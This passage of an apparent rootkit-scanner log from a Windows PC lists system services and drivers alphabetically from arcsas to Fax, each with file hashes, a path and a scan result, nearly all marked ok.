21:27:00.0845 0x0ce4 [ 6E456A94B9BD7F6B4758729BCEDE40C3, 2F3146AC960992FA947A8E8C4D5497624A5BC69B7A3EECA117AD599C70DDE8E3 ] arcsas C:\WINDOWS\system32\drivers\arcsas.sys
21:27:00.0852 0x0ce4 arcsas - ok
21:27:00.0868 0x0ce4 [ BBF8F831C7720DD5135D8C4C8325187A, 2630C68200D7BD49A5772830D6B369C0EC337C2558A9562DD564DF042249ECC0 ] asComSvc C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
21:27:00.0886 0x0ce4 asComSvc - ok
21:27:00.0898 0x0ce4 [ E536856E96A7605EBF580D62A868E5FE, 70D0F6ECB05E923C1B274605CB3320091D35D7622003FF7E4806645519C70F01 ] ASGT C:\Windows\SysWOW64\ASGT.exe
21:27:00.0902 0x0ce4 ASGT - detected UnsignedFile.Multi.Generic ( 1 )
21:27:01.0310 0x0ce4 Detect skipped due to KSN trusted
21:27:01.0310 0x0ce4 ASGT - ok
21:27:01.0324 0x0ce4 [ 5F1091FA113607C9C9B2ECF4FBC76F37, F4406635C555A942242F40CACEC7EFD2FED47103C191CB3C2EDF21EE78C8122E ] asHmComSvc C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
21:27:01.0341 0x0ce4 asHmComSvc - ok
21:27:01.0345 0x0ce4 [ 798DE15F187C1F013095BBBEB6FB6197, 436CCAB6F62FA2D29827916E054ADE7ACAE485B3DE1D3E5C6C62D3DEBF1480E7 ] AsIO C:\WINDOWS\syswow64\drivers\AsIO.sys
21:27:01.0349 0x0ce4 AsIO - ok
21:27:01.0357 0x0ce4 [ 9A1BAED68C52FA4668C3933AA93E9530, B92B2E9DBFFBB329D6009A72A7B766350833A1F9CAA74E63C380A8BA0B580BE0 ] AsusFanControlService C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe
21:27:01.0367 0x0ce4 AsusFanControlService - detected UnsignedFile.Multi.Generic ( 1 )
21:27:01.0773 0x0ce4 Detect skipped due to KSN trusted
21:27:01.0773 0x0ce4 AsusFanControlService - ok
21:27:01.0778 0x0ce4 [ 766F3A7E42AFCF74265FAC78987D1665, 8FE82913DF5CF79B49B28B3CD782AF09FF30585A37473AE3E518A26C5D6453D0 ] AsyncMac C:\WINDOWS\System32\drivers\asyncmac.sys
21:27:01.0785 0x0ce4 AsyncMac - ok
21:27:01.0788 0x0ce4 [ 01733BEEE02E51F712330D5909BD701C, A583B482DBE701A752EDFDEAE2EF16D7160DFEA6077E0C8EF013828E285D960A ] atapi C:\WINDOWS\system32\drivers\atapi.sys
21:27:01.0794 0x0ce4 atapi - ok
21:27:01.0850 0x0ce4 [ D03E551165C72F2A4BBDDC566EAA819E, 8047E2D20724B464B481F06C3AC1FA5734E97F7EC0D86EFEECD76480C84B3959 ] athr C:\WINDOWS\System32\drivers\athwnx.sys
21:27:01.0943 0x0ce4 athr - ok
21:27:01.0953 0x0ce4 [ 13C3C48F9614F3FEE858DD7C8E39E9EC, 54F30BFA71B38D404572DAA51B6B57D589C1C99B16F2F14FB69CDA1B76FAAB74 ] AtiHDAudioService C:\WINDOWS\system32\drivers\AtihdWT6.sys
21:27:01.0961 0x0ce4 AtiHDAudioService - ok
21:27:01.0972 0x0ce4 [ 8FF48F1C894EDC6AA55CCF01AE1338EC, 446654CC72062061F2F80DEAA30C4F575B34BAC31D50C174F4DA20B7ED2D13C7 ] AudioEndpointBuilder C:\WINDOWS\System32\AudioEndpointBuilder.dll
21:27:01.0991 0x0ce4 AudioEndpointBuilder - ok
21:27:02.0012 0x0ce4 [ DCD20FAF0485C59032397DA2F93746AE, BED193535533E7264FD29BC0AE1BBD6F97EA92FF117EF4A527B0677E630B94EF ] Audiosrv C:\WINDOWS\System32\Audiosrv.dll
21:27:02.0046 0x0ce4 Audiosrv - ok
21:27:02.0071 0x0ce4 [ DA978AB6E0AAEA82235C943DEED3484C, 42A3ADB76B9E5F7309992C9737956CBE1706DD0FEC9565F493EDD104D8E64C97 ] avc3 C:\WINDOWS\system32\DRIVERS\avc3.sys
21:27:02.0098 0x0ce4 avc3 - ok
21:27:02.0114 0x0ce4 [ 09A3015AEA14CF9A4ECDE1CEA6AFE0AA, 77A58DE0961F1C2BD9627A975EF661A63EA5E4A3361433353408EABCE6869317 ] avckf C:\WINDOWS\system32\DRIVERS\avckf.sys
21:27:02.0131 0x0ce4 avckf - ok
21:27:02.0136 0x0ce4 [ 6086B5EE0DA4600B2EC2725D82DEB74E, C67CA7021D710CFDCF62B17A2B2890E61E4F1E3D956312688454FD85738C303F ] AxInstSV C:\WINDOWS\System32\AxInstSV.dll
21:27:02.0146 0x0ce4 AxInstSV - ok
21:27:02.0156 0x0ce4 [ 0914A5E66C0775CE11960452A6434FEC, 978C1E20023841FBFEF0CEAFE09EDB679612C8E5986C6E40C1F6D0835112D13E ] b06bdrv C:\WINDOWS\system32\drivers\bxvbda.sys
21:27:02.0169 0x0ce4 b06bdrv - ok
21:27:02.0173 0x0ce4 [ F8129321B1874D4386F7FEB754BC3380, 7264E7E2A339E456C0A1A40FDFAE0D202905467400B93FA0700498B86172337F ] BasicDisplay C:\WINDOWS\System32\drivers\BasicDisplay.sys
21:27:02.0180 0x0ce4 BasicDisplay - ok
21:27:02.0184 0x0ce4 [ CFD199354CC01F5857F3F27BC1BA2DBE, 8C3173A28EE11CE62789DC86F2DA56944478015ECB1BA02E1AFFDEDF5280373C ] BasicRender C:\WINDOWS\System32\drivers\BasicRender.sys
21:27:02.0191 0x0ce4 BasicRender - ok
21:27:02.0195 0x0ce4 [ 739D089777D2B66DBE7201E5EA4BA2D7, 9AD12E18A042C5B8EFB19297BC2E7BD1FEF75A138FEFB64C6BF0261FD3E53AB1 ] bcmfn2 C:\WINDOWS\System32\drivers\bcmfn2.sys
21:27:02.0202 0x0ce4 bcmfn2 - ok
21:27:02.0205 0x0ce4 [ 4B190ACAE90EC79AD4D43EFCD3743DA0, 9D5187D4E1DF1672DEA2EF5C910FCA08BD8ED0573A55DF774E5300312ED87E05 ] bdelam C:\WINDOWS\system32\drivers\bdelam.sys
21:27:02.0213 0x0ce4 bdelam - ok
21:27:02.0220 0x0ce4 [ C3B27514035315E3C1FCE64E69E253ED, 03AF100927077AD608C5EA47A17081CEA849F44C471AF978F410B83E2ABA5AE7 ] BDESVC C:\WINDOWS\System32\bdesvc.dll
21:27:02.0235 0x0ce4 BDESVC - ok
21:27:02.0241 0x0ce4 [ 14F686FA27C2914128031504B70D2B5E, BED77F4A6DC8B30ADB698FBCC00153D924310188EFBE22ADD2BAA3321C746556 ] bdfwfpf C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys
21:27:02.0247 0x0ce4 bdfwfpf - ok
21:27:02.0251 0x0ce4 [ D8FAF7CFBC81E5E15CA7A7EC8EE1B409, 75E60DF2147DFB109E628FDF80EB1BFA5360E5935BB9237B67053588F906E1B1 ] BDVEDISK C:\WINDOWS\system32\DRIVERS\bdvedisk.sys
21:27:02.0256 0x0ce4 BDVEDISK - ok
21:27:02.0259 0x0ce4 [ ED03D2ACE378C9EB8BB957ABBD85B951, E9AE3025DC4956B736651B20AEA665909C2B468F9AE3E317F545DD4EEEA7D9E8 ] Beep C:\WINDOWS\system32\drivers\Beep.sys
21:27:02.0265 0x0ce4 Beep - ok
21:27:02.0279 0x0ce4 [ 1FDC6CB56572203E6F4BF4E3FB30B886, 81D5C77C823DC078EEEB2DABEE5203D542C824E04FEDD96AA58F96037C065155 ] BFE C:\WINDOWS\System32\bfe.dll
21:27:02.0302 0x0ce4 BFE - ok
21:27:02.0321 0x0ce4 [ 5C0D4DBACB90D9ECE77907F4F6CF9EF6, FC29F03FB7E58A9ED17A34BC2D8E39533070B8B23D1A110622C3A213BF48CD2D ] BITS C:\WINDOWS\System32\qmgr.dll
21:27:02.0352 0x0ce4 BITS - ok
21:27:02.0357 0x0ce4 [ 2342B8619193B0D9FAC0D02C69DCE74A, 06A1512C9750ACD154DE8873DE6628355B7195759CE54FA96097EA6D56BE320E ] bowser C:\WINDOWS\system32\DRIVERS\bowser.sys
21:27:02.0365 0x0ce4 bowser - ok
21:27:02.0379 0x0ce4 [ 04B27B2DE2981E79E078FAAC3AA8748F, 716F00D507D37CC549BE665D957186F2CF7B2B8C9B959B0FE8D01EBED2F154C6 ] BrokerInfrastructure C:\WINDOWS\System32\bisrv.dll
21:27:02.0403 0x0ce4 BrokerInfrastructure - ok
21:27:02.0408 0x0ce4 [ 9C7F445B018AB4744B6E0C657B5D1833, 83D04F5E3D4BA46BBD8A67764A60F5731F86B0BE3A85C2858E002ABCC362F592 ] Browser C:\WINDOWS\System32\browser.dll
21:27:02.0417 0x0ce4 Browser - ok
21:27:02.0421 0x0ce4 [ AF57F0B0E284BE06860A7B701341324D, F94E44C777FDC049158B7BF73DAFCDB103D08493AC898D1C928771650F664412 ] BthAvrcpTg C:\WINDOWS\System32\drivers\BthAvrcpTg.sys
21:27:02.0428 0x0ce4 BthAvrcpTg - ok
21:27:02.0432 0x0ce4 [ 4C0FCF1BF33A706D2D23C122D5AF990C, 8FF78C6ABF1DB8D9EF318D2C71EA29E65EC80BCA24BC53CE1F521182733383CC ] BthEnum C:\WINDOWS\System32\drivers\BthEnum.sys
21:27:02.0441 0x0ce4 BthEnum - ok
21:27:02.0445 0x0ce4 [ 729CC10B1658178F0F009FE0E9159281, B0F692CAB2BE47415C8A8CCCE8D53CDDF2B70518536ACF91CF96D74ADD04AF9C ] BthHFEnum C:\WINDOWS\System32\drivers\bthhfenum.sys
21:27:02.0453 0x0ce4 BthHFEnum - ok
21:27:02.0456 0x0ce4 [ 336A9C0254A0178ED50281B6EDF5B836, C9C454C6EC4FF5897B1873A7E90D1CE8122E43783E978A570CEA75E15F65DE97 ] bthhfhid C:\WINDOWS\System32\drivers\BthHFHid.sys
21:27:02.0463 0x0ce4 bthhfhid - ok
21:27:02.0471 0x0ce4 [ D8428BEF4033C7BFCD981074E2318F89, 9C0692F8387BAD94CCA4E36B59701A7A7B8FDCB5377B4C2CA75424583835E112 ] BthHFSrv C:\WINDOWS\System32\BthHFSrv.dll
21:27:02.0487 0x0ce4 BthHFSrv - ok
21:27:02.0491 0x0ce4 [ 096C2A149591410A44F1C6CBE4866729, 4ED981A9AA10979C305DEC6E02DD0FF445C64055B5493007BDD5283B4626C0B9 ] BthLEEnum C:\WINDOWS\system32\DRIVERS\Microsoft.Bluetooth.Legacy.LEEnumerator.sys
21:27:02.0499 0x0ce4 BthLEEnum - ok
21:27:02.0503 0x0ce4 [ 5428242193611BF91DDBF4F58900A55A, 91D59B0D0C7CA3DBBA8CA7CAD1E24845A224F451FC1880BE8CB7C1585AC79080 ] BTHMODEM C:\WINDOWS\System32\drivers\bthmodem.sys
21:27:02.0511 0x0ce4 BTHMODEM - ok
21:27:02.0515 0x0ce4 [ E39223EAA36AC546A03ABE213C960A37, D1CFCC3BE2DD76BAE1EA927E9F32BD178D5C5593A4CD34E81038BB692957894E ] BthPan C:\WINDOWS\System32\drivers\bthpan.sys
21:27:02.0524 0x0ce4 BthPan - ok
21:27:02.0540 0x0ce4 [ 622833A26A27F15F42CE0888B1C70472, 9EED4C69DD955AE591270F0E371BEA256AA6DD9C527231BAD191FF3ED3A0826E ] BTHPORT C:\WINDOWS\system32\DRIVERS\BTHport.sys
21:27:02.0567 0x0ce4 BTHPORT - ok
21:27:02.0573 0x0ce4 [ 6927D295017E9F1A5D655A8F3A122672, 4B686C93056924580390440B49C721BD9039D5C972994D8EA96CA848B786B693 ] bthserv C:\WINDOWS\system32\bthserv.dll
21:27:02.0582 0x0ce4 bthserv - ok
21:27:02.0587 0x0ce4 [ FA5CE6301192DD6ED4AA747B2C88FD42, F06A7748FCB6BBF0BB0A8348F505A1703EF2D1B59DC5BA6B600951200463F876 ] BTHUSB C:\WINDOWS\system32\DRIVERS\BTHUSB.sys
21:27:02.0595 0x0ce4 BTHUSB - ok
21:27:02.0598 0x0ce4 [ 102CAA11BA89290D48FBFD2E04274BA0, 9C6786AD6C8BE5AF7538BAD553C401B0D7443E533CDE59E975CF3E07EF262F0C ] buttonconverter C:\WINDOWS\System32\drivers\buttonconverter.sys
21:27:02.0605 0x0ce4 buttonconverter - ok
21:27:02.0608 0x0ce4 [ 029434AC0A3935F9125ABBD08BF7C30B, 742338B882488CA83F502ACEBFEDC2783B8D9D6C391FE1088988276315A065F6 ] CAD C:\WINDOWS\System32\drivers\CAD.sys
21:27:02.0614 0x0ce4 CAD - ok
21:27:02.0618 0x0ce4 [ 307AE8BC9B45772DA02FB952A1D86C35, 4983AC71C8E164D9E6669D345925B4FBEDD0A0A4566887E7ECC56C996B66DBD4 ] CapImg C:\WINDOWS\System32\drivers\capimg.sys
21:27:02.0627 0x0ce4 CapImg - ok
21:27:02.0630 0x0ce4 [ B6E5AD7C83A5254DEE9D86023C0E5A81, 40F297406A025378A6273535475C1FF8C99BC6502B17C0E161131DA754D7974B ] cdfs C:\WINDOWS\system32\DRIVERS\cdfs.sys
21:27:02.0640 0x0ce4 cdfs - ok
21:27:02.0655 0x0ce4 [ 00C7849679FCF4AE8DA78DC16BDDA369, CCEDC195D5D9512BA9E50FF586CB4B7AB9AE7091E71A24D46A934E97D84DFEBD ] CDPSvc C:\WINDOWS\System32\CDPSvc.dll
21:27:02.0682 0x0ce4 CDPSvc - ok
21:27:02.0693 0x0ce4 [ 618DA70D0D90DF3602259C1B121794DD, D2AF7967DE38F3B7C10824A1C900A145F45C57C0F179753A85989406600C4279 ] CDPUserSvc C:\WINDOWS\System32\CDPUserSvc.dll
21:27:02.0712 0x0ce4 CDPUserSvc - ok
21:27:02.0719 0x0ce4 [ ABE77AD954BC3D72F559CF0C381E50BC, D0F24B023D7CADD4893AAF223A9BAC00B2C58D552E0C314B506C01767FB74133 ] cdrom C:\WINDOWS\System32\drivers\cdrom.sys
21:27:02.0728 0x0ce4 cdrom - ok
21:27:02.0734 0x0ce4 [ 0EC94DA356D89CACD89B6E139E4D0A7D, 2F887681FDD5AB787154403E34623B1DFB61C70DAE5E2BFF1565E100F228870B ] CertPropSvc C:\WINDOWS\System32\certprop.dll
21:27:02.0745 0x0ce4 CertPropSvc - ok
21:27:02.0752 0x0ce4 [ 05EA22CFC40EDE05BF6E3BC782E5204C, F0C9C692FC31387E9D19426D3253317B6BA86D7118E3884C11E3287695006443 ] cht4iscsi C:\WINDOWS\system32\drivers\cht4sx64.sys
21:27:02.0763 0x0ce4 cht4iscsi - ok
21:27:02.0793 0x0ce4 [ 863E1C9F6750446DFB9EDCAEC3531367, 88C5EE76FD85640EB1440DEFC7B6CB918E18DC09507BA91FAE285370B8C7D56A ] cht4vbd C:\WINDOWS\System32\drivers\cht4vx64.sys
21:27:02.0830 0x0ce4 cht4vbd - ok
21:27:02.0834 0x0ce4 [ 3E416539352B007AD0610BF34AC15D31, E2041129770B24AE95C5EC4B507477C72DFE8CB08D412E2621BF67207F9DEB8C ] circlass C:\WINDOWS\System32\drivers\circlass.sys
21:27:02.0842 0x0ce4 circlass - ok
21:27:02.0844 0x0ce4 [ 616E1ED94FA7F96D429D985FDB203D2E, EA681C442AA0F7D424C8DABD8D1C14653E61BDE740C0BC4C6C308B5FB4FE67AA ] CldFlt C:\WINDOWS\system32\drivers\cldflt.sys
21:27:02.0856 0x0ce4 CldFlt - ok
21:27:02.0864 0x0ce4 [ 96C01F97576D2542FCBD28E13C8CC6A1, 98E2501197B97399EB1F7C8AA96B5696931736E44400314E768A6C029B9E1C62 ] CLFS C:\WINDOWS\system32\drivers\CLFS.sys
21:27:02.0874 0x0ce4 CLFS - ok
21:27:02.0889 0x0ce4 [ A5CA2992D42DB271DF933F49676E57DE, 7CC6B2908D9E2EDF848949C78433FAEC5526AE38307D095AA0EC66BFC45AEE3A ] ClipSVC C:\WINDOWS\System32\ClipSVC.dll
21:27:02.0908 0x0ce4 ClipSVC - ok
21:27:02.0911 0x0ce4 [ 5118CFC33BBB51C7E3ED441B7085AD26, 8D33864FF750926C4B95827FFAD24C558DE8A90FC5B2663084DEAB5ADBBFAFD2 ] clreg C:\WINDOWS\System32\drivers\registry.sys
21:27:02.0918 0x0ce4 clreg - ok
21:27:02.0924 0x0ce4 [ 232F3A3AC3A2FB32C5C46503A6517073, 9E0232E095471E6C8825E870F5842838F1AE515E56410F6A5CC3D58A9A4AF33A ] CmBatt C:\WINDOWS\System32\drivers\CmBatt.sys
21:27:02.0931 0x0ce4 CmBatt - ok
21:27:02.0942 0x0ce4 [ 3413CE81E02C091F33C4C3DD3071630F, 4758A2BB2FD453E9867C04CC420D12B279BB97E3C4E664A7058EA5F1EC63D04C ] CNG C:\WINDOWS\system32\Drivers\cng.sys
21:27:02.0957 0x0ce4 CNG - ok
21:27:02.0961 0x0ce4 [ E1BFF774FF67CA951A5DFF0E104FB132, 68809C4B72C54CEDE3AD33F5634E15A0225A67B391F9012EC7CEBA8AFC6EC3D5 ] cnghwassist C:\WINDOWS\system32\DRIVERS\cnghwassist.sys
21:27:02.0967 0x0ce4 cnghwassist - ok
21:27:02.0976 0x0ce4 [ DFDAEDB857BC18764F0D8ECDCC3C1499, AE12E908BAF53C605A17A9FB1AFD6BFBEC75EBE45D893541281473C197C71FED ] CompositeBus C:\WINDOWS\System32\DriverStore\FileRepository\compositebus.inf_amd64_de4c68ea4fb1be53\CompositeBus.sys
21:27:02.0983 0x0ce4 CompositeBus - ok
21:27:02.0986 0x0ce4 COMSysApp - ok
21:27:02.0989 0x0ce4 [ 04532711732BE9DBC364E88E4A9EC18A, FCEB1F486E146A3FE7307397C1EB6760BFD8A327545F81C546F7134B08615B9E ] condrv C:\WINDOWS\system32\drivers\condrv.sys
21:27:02.0995 0x0ce4 condrv - ok
21:27:03.0010 0x0ce4 [ D734EBC7E66D82D543C874ED1FE9B40D, 8381E7B619BB36A1896C2A472AB830B775F317BE6ABDE98E4F943337C21930E0 ] CoreMessagingRegistrar C:\WINDOWS\system32\coremessaging.dll
21:27:03.0030 0x0ce4 CoreMessagingRegistrar - ok
21:27:03.0037 0x0ce4 [ 1F7F1A15B807BC7B241BB2FEEA79BC92, D756E2247757C274F3470B46FCDBB63317C05E8E66FDA9DB7ABF3A6820933D4C ] CryptSvc C:\WINDOWS\system32\cryptsvc.dll
21:27:03.0046 0x0ce4 CryptSvc - ok
21:27:03.0057 0x0ce4 [ EFB2A77F0CD1B8A79899C1D37B01CA86, 9FA32E0853FA93513ACA2CD4203DE8BC22268ABCA4BBDB366307C106F4FD5917 ] CSC C:\WINDOWS\system32\drivers\csc.sys
21:27:03.0074 0x0ce4 CSC - ok
21:27:03.0087 0x0ce4 [ F010BDED808E86E1046F08865C11EDF2, 48FE0D176F7FA1F04685C0A1FD4FFB6464B6B88883D7D50E05C9C6C0636E895A ] CscService C:\WINDOWS\System32\cscsvc.dll
21:27:03.0109 0x0ce4 CscService - ok
21:27:03.0114 0x0ce4 [ 994A369A2DFC62ADED1226C70F69D20D, 916AF63ADD92362F5361902AB4C1507086EAB8839BEC10DB65CDE0AAB20681DE ] dam C:\WINDOWS\system32\drivers\dam.sys
21:27:03.0121 0x0ce4 dam - ok
21:27:03.0139 0x0ce4 [ 0E79A4C76CAAA0CFE9CA42C13E5AA086, C4D90EDA54216CC7897128D39517E4E18195BF28254796C6D0684E2C7DB90642 ] DcomLaunch C:\WINDOWS\system32\rpcss.dll
21:27:03.0169 0x0ce4 DcomLaunch - ok
21:27:03.0178 0x0ce4 [ 1175E107082287A58A756239F48E1A73, 0DB2017061D94FAC95CEBD7C4729E42018A92698D72CEE3EA412A9D14DB8D552 ] defragsvc C:\WINDOWS\System32\defragsvc.dll
21:27:03.0200 0x0ce4 defragsvc - ok
21:27:03.0209 0x0ce4 [ BBCAC50027D030E07EC7E5C36469FAFF, FEF39659F21D2AE676E4882FBAF5A881C534BB7EA26E5EFF9F7B5F8B952D6532 ] DeviceAssociationService C:\WINDOWS\system32\das.dll
21:27:03.0225 0x0ce4 DeviceAssociationService - ok
21:27:03.0229 0x0ce4 [ A2BACEBAC01BE7A6656B454E75C23262, C2C168718A341D48679AC4CA8005BD06E9F1F0D1F7C72D3C30A7A8CE1F665A43 ] DeviceInstall C:\WINDOWS\system32\umpnpmgr.dll
21:27:03.0246 0x0ce4 DeviceInstall - ok
21:27:03.0257 0x0ce4 [ 5B84093D490A6B060C8BE60BA52C876F, D34A854418A66529B18313A50E6D7EAB982611AD9AB0335245AE764FE0602C22 ] DevicesFlowUserSvc C:\WINDOWS\System32\DevicesFlowBroker.dll
21:27:03.0280 0x0ce4 DevicesFlowUserSvc - ok
21:27:03.0284 0x0ce4 [ F08F70BBD833BAA3BF0D5E500CBEE6CC, 8BB99E6D96CB8B25036549030986EC267C26BF1FC66E4EB00A3E41FE3BB5DE70 ] DevQueryBroker C:\WINDOWS\system32\DevQueryBroker.dll
21:27:03.0292 0x0ce4 DevQueryBroker - ok
21:27:03.0297 0x0ce4 [ 185A4519B7764F4DEF714D890A7A9FD2, 9805D9DB42D11582583EA3F0FFEE9EF2B0C536DA99A9A3D3863B2669B1CC34A7 ] Dfsc C:\WINDOWS\system32\Drivers\dfsc.sys
21:27:03.0311 0x0ce4 Dfsc - ok
21:27:03.0315 0x0ce4 [ 9593475FBC857A05D93BFF4FA7323C2B, D2A958AF5EFDC6136A6ABB7F8D5FE1F84C967E79BEA96C5BE3661A0145DEB907 ] dg_ssudbus C:\WINDOWS\system32\DRIVERS\ssudbus.sys
21:27:03.0322 0x0ce4 dg_ssudbus - ok
21:27:03.0329 0x0ce4 [ BC5188B3F35BB8070888441A2A740465, 05C18A3DC1BD96C6751E76DBF57C47E526A1F9DF5E013B20B69EA0159CD6CE56 ] Dhcp C:\WINDOWS\system32\dhcpcore.dll
21:27:03.0343 0x0ce4 Dhcp - ok
21:27:03.0347 0x0ce4 [ 5DF493C7954890EEC65CC2A21D479F76, 67087AAAC2AF93F265077AA392444E32DC299918A843A8AECFBE73636A5F2314 ] diagnosticshub.standardcollector.service C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
21:27:03.0356 0x0ce4 diagnosticshub.standardcollector.service - ok
21:27:03.0391 0x0ce4 [ F38183343C14B0C0BAB900640652257F, 2C42D206A552A527097BF586F338D89252B6F90044A54322757A4B74644E66E1 ] DiagTrack C:\WINDOWS\system32\diagtrack.dll
21:27:03.0450 0x0ce4 DiagTrack - ok
21:27:03.0456 0x0ce4 [ 1203EA16F36C5BEB2509FB7CC03DC178, 195209CB711E5BDE24A50C88AA62F32E8AE26F6A83B423374FCA41444F55D1CE ] Disk C:\WINDOWS\system32\drivers\disk.sys
21:27:03.0462 0x0ce4 Disk - ok
21:27:03.0472 0x0ce4 [ 626E3564A7588139DE2367E14F8CAAB2, 472530B6DD70F4A5E61A8572B0479A6DF3BE8B4DD1E021BF00D05B3553927463 ] DmEnrollmentSvc C:\WINDOWS\system32\Windows.Internal.Management.dll
21:27:03.0499 0x0ce4 DmEnrollmentSvc - ok
21:27:03.0502 0x0ce4 [ 038B8B76284BC291EC75B005BB3EB13F, FE7BD7CF833C4A96ABF4FD6EBAB829CC4D8096780A22A313035D7E49BBA12D36 ] dmvsc C:\WINDOWS\System32\drivers\dmvsc.sys
21:27:03.0509 0x0ce4 dmvsc - ok
21:27:03.0512 0x0ce4 [ 32C76DFE2586EBECFFA4112E9196591C, 190C294F50B96B13D0B776F7C19DCB47EAACBEE999CBA50236CF8C856CF38B17 ] dmwappushservice C:\WINDOWS\system32\dmwappushsvc.dll
21:27:03.0527 0x0ce4 dmwappushservice - ok
21:27:03.0533 0x0ce4 [ FC3AA34608A69BDAC67E31FB70C8A720, 38815F527DF963B4A7D93895776DDD618BD29782B1FA74EB1A7319AE58739A06 ] Dnscache C:\WINDOWS\System32\dnsrslvr.dll
21:27:03.0546 0x0ce4 Dnscache - ok
21:27:03.0552 0x0ce4 [ F08CB37830A1F9950E8B2F7B1F78CC7E, E4E75645893597F6A02B98DC4F126A664F5DEF7B1CD4C2DEE5CA8ED18DB64C9C ] dot3svc C:\WINDOWS\System32\dot3svc.dll
21:27:03.0565 0x0ce4 dot3svc - ok
21:27:03.0570 0x0ce4 [ 3425E26D0A7792F2EE7745C0336C2062, 54A3AFFC31C2641BCE1877F2CBA61D2CD7191BA39FD5B3659491E4E307570C1E ] DPS C:\WINDOWS\system32\dps.dll
21:27:03.0583 0x0ce4 DPS - ok
21:27:03.0586 0x0ce4 [ 3D934A1C02EB6979CF45C70A71F580EC, 279B325E18ABF82FF523095D8D5958A3A48C7B7A4F64BD562DDED1D0662B608A ] drmkaud C:\WINDOWS\system32\DRIVERS\drmkaud.sys
21:27:03.0591 0x0ce4 drmkaud - ok
21:27:03.0596 0x0ce4 [ 5E92CB292D676634058E6C62653C9227, CE35C51B444664641306B4C2E21978B3418B58B2A973B19B908D86FE723FB4C4 ] DsmSvc C:\WINDOWS\System32\DeviceSetupManager.dll
21:27:03.0610 0x0ce4 DsmSvc - ok
21:27:03.0614 0x0ce4 [ E479C2656A3A47F5D4FAD10AE6EAED52, B17D18D5440CF131EEADA385989A8ED0DB7728CAAC4E745720947DD1BC4F9EF6 ] DsSvc C:\WINDOWS\System32\DsSvc.dll
21:27:03.0626 0x0ce4 DsSvc - ok
21:27:03.0632 0x0ce4 [ 682D7DF9704217DD8716307F9E2EEC05, A8D36414A7316C59995CF9689DD84B2FD3FECE47E39F515C81BC3C439890E993 ] DusmSvc C:\WINDOWS\System32\dusmsvc.dll
21:27:03.0652 0x0ce4 DusmSvc - ok
21:27:03.0687 0x0ce4 [ 5FB6528EC95A2E83AE71005108C03D2B, F419FEA6679B59C5993235875C7857E8D960CDDC47E69EF08B20B6774FB08A45 ] DXGKrnl C:\WINDOWS\System32\drivers\dxgkrnl.sys
21:27:03.0730 0x0ce4 DXGKrnl - ok
21:27:03.0737 0x0ce4 [ ECA1628436628362856ACF239E6AFD29, 19051DC348918B863E0A272CF56891B8CB49E7E705B8BAC7663D36C797A7B962 ] EapHost C:\WINDOWS\System32\eapsvc.dll
21:27:03.0752 0x0ce4 EapHost - ok
21:27:03.0755 0x0ce4 EasyAntiCheat - ok
21:27:03.0801 0x0ce4 [ D64CD3AE93125EDA383190C2AF607E70, 3D180B96C6A2318842FA03AE5F703320A93CF1F440FF7D0E6F6F9BAD98F2FA02 ] ebdrv C:\WINDOWS\system32\drivers\evbda.sys
21:27:03.0858 0x0ce4 ebdrv - ok
21:27:03.0866 0x0ce4 [ EABFCDA6E996F8A32DC1B302F7683BB2, 5FF2BA89D9A7BDE78C40866F15EC576527699ADD0F120E1A8388C4404A69F0E8 ] EFS C:\WINDOWS\System32\lsass.exe
21:27:03.0873 0x0ce4 EFS - ok
21:27:03.0877 0x0ce4 [ FFBB37982E6D24AEC7A2E5459098EAC9, E89DD74540088ECAC9E802D7A059C0A6E3E5412BD42E5E9F26258724458EF8DB ] EhStorClass C:\WINDOWS\system32\drivers\EhStorClass.sys
21:27:03.0884 0x0ce4 EhStorClass - ok
21:27:03.0888 0x0ce4 [ ABF38D02E01D6ED87AE1DF65FC5DF62D, 57D48609DA30F60016D2ADEB9A772942FB39A117247EB63FAE3FCF50D726B698 ] EhStorTcgDrv C:\WINDOWS\system32\drivers\EhStorTcgDrv.sys
21:27:03.0894 0x0ce4 EhStorTcgDrv - ok
21:27:03.0969 0x0ce4 [ 8921F2C5CF96BD0903E6350CE109B266, 273ABF6300E6ACCD5F1F82973AAA2158649757C198B84CAB8AFD35EE699A5FD3 ] ElfoService D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe
21:27:03.0993 0x0ce4 ElfoService - ok
21:27:04.0001 0x0ce4 [ 0910A2954D7053537495DFF981177ACC, 9A70B599B02C67E3E3EC4FA10D76ABABA614B8CC224965B8F9479E13E68019A1 ] embeddedmode C:\WINDOWS\System32\embeddedmodesvc.dll
21:27:04.0012 0x0ce4 embeddedmode - ok
21:27:04.0019 0x0ce4 [ CA966CED8970A60FB00A3592564EF093, 4BD904032445235EE69DAA0024E0FB3D8B2325D897A683E334754EB3CA90AB39 ] EntAppSvc C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
21:27:04.0032 0x0ce4 EntAppSvc - ok
21:27:04.0035 0x0ce4 [ B9A59B4AD516E38C39FA416398B96CCB, 4630A9AD414476B47F634F2EB5659597797222A8938B68847B97FECCE1A1B5F8 ] ErrDev C:\WINDOWS\System32\drivers\errdev.sys
21:27:04.0043 0x0ce4 ErrDev - ok
21:27:04.0054 0x0ce4 [ 1541374239F33512D7F4D24ED1E9238C, 8B1548D4052A72175EB6ADA9FD4286ACD5041E1CE071DCAC3760BB227FCD3621 ] EventSystem C:\WINDOWS\system32\es.dll
21:27:04.0070 0x0ce4 EventSystem - ok
21:27:04.0077 0x0ce4 [ 9C4D88E8614487AD85A6F18A71A7298F, EE6F48C89D6379C7361484EAE7C7FAAA477D48032BFDD0D363E48642E62EADF4 ] exfat C:\WINDOWS\system32\drivers\exfat.sys
21:27:04.0091 0x0ce4 exfat - ok
21:27:04.0098 0x0ce4 [ 8F51A5633DEB18DBC8B1C117B42B23D7, C45FEE32C5AB67CEC86AB1388AC2E3508AF5811D8B8A204AAC8E5DC42C749A2C ] fastfat C:\WINDOWS\system32\drivers\fastfat.sys
21:27:04.0109 0x0ce4 fastfat - ok
21:27:04.0121 0x0ce4 [ ECC5AEFEA31F1A078E954305B8CA6373, 15948D017E3B52D3B4BBEC047F963BD77247E24A59F0532B6A023B0C4159FC84 ] Fax C:\WINDOWS\system32\fxssvc.exe
21:27:04.0141 0x0ce4 Fax - ok
